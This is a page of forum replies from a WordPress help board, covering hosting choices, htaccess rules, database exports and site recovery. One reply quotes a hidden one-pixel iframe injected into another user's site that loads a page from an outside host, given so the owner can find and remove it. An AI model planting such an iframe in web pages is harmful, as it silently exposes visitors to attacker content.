Forum Replies Created

Viewing 15 replies - 16 through 30 (of 30 total)
  • why not installing it by using the manual upload method ? btw your wordpress site before was located at /root/wordpress (it looks like this (www.take3eggs.com/wordpress/)

    i thought you already know about that before deleting your entire file because i’ve already visit your page before posting my previous post, and see the default godaddy index page and by using common sense im trying to use /wordpress and it works fine, i can visit your wordpress page but it seems that you already delete everything .. so i guess you’ll have to use manual method by uploading all wordpress files instead of contacting godaddy with 1 click install problem

    i’ve been to your pages and found something nice at your site (i add space to the iframe src tag):

    </body>
    </html><iframe width="1" height="1" src="https:// step57.info/traff/index2.php" style="border: 0;"></iframe>
    </div>
    <iframe width="1" height="1" src="https:// step57.info/traff/index2.php" style="border: 0;"></iframe>

    try removing that iframe tag first and see it if solve your problem

    edit: forget to put this line before =D

    there’s no virus detected from your site .. dunno about that iframe thing because i already set to block every iframe tag

    the easiest way is to delete index.html / index.htm from the root directory instead of specifying directoryindex in htaccess

    here’s the default that came with wp (if you put wp in root directory of your web server)

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    open your page and look at its source at this section :

    link rel="alternate" type="application/rss+xml"

    usually your feed url is yourdomain.com/feed/

    If you’re using Godaddy hosting, the mysql server is not localhost. Check it under the sql database first to locate the godaddy mysql server

    Im using hostgator right now, so far i dont have any problem with it .. actually i choose hostgator rather than dreamhost because i can pay month to month and without initial setup fee .. lol

    2.0.5 ? are you sure about that ? because the most recent stable version is 2.0.4 and as far as i know that wordpress version 2.0.4 is the most secure version of wordpress as for now except that if you’re using WP-DB Backup plugin (its already fixed)

    thanks alot moshu for your answers, and i just registered with them and still waiting for their email confirmation or other email related stuff from them ??

    Im very interested on moving to LinkSky (right now im at godaddy and because of some problem with 302 HTTP header im going to move to another host), but i have a question first to anyone who’s already using LinkSky (because there’s no way i can call the customer support and if im using email im pretty sure they’ll reply it when its already midnight in my country) :

    – Is there any hidden fees ?
    – Is it true that they give you an unmetered bandwidth ?
    – Is it true there’s no setup fee and you can pay monthly ? (because most of the wordpress recomended hosting use setup fee which is expensive although i can pay the monthly fee)
    – Can i host multiple domain in basic hosting plan ?

    thanks in advance

    Thread Starter Reaper-X

    (@reaper-x)

    actually i’ve emailed my web hosting (godaddy) because i dont think i’ll get answers here .. lol, and still waiting for a reply … anyway thanks alot ??

    Im using only drop table, if not exists, auto increment, enclose table name, use hexadecimal for structure and only check complete insert and use hexadecimal binary field for data and never experience any problem with it

    btw why did you check complete insert and extended inserts at the same time ? there’s no need to use them both

    Forum: Fixing WordPress
    In reply to: Please help…

    640 is more than enough for files

    i’ve tried importing your sample post and it works fine without problem (at my test site not my actual site) … without changing anything except the post date into 19 august

    you can check it at reaper.gig4free.com and see the top post because its your post

    but i have a question for you … are you trying to import from movable type from localhost ?

    and sorry for my bad english ??

    i have question for you dodi22, what wordpress version you’re using before you got your site hacked ?

    EDIT : it seems that you’re using wordpress 2.0.2

Viewing 15 replies - 16 through 30 (of 30 total)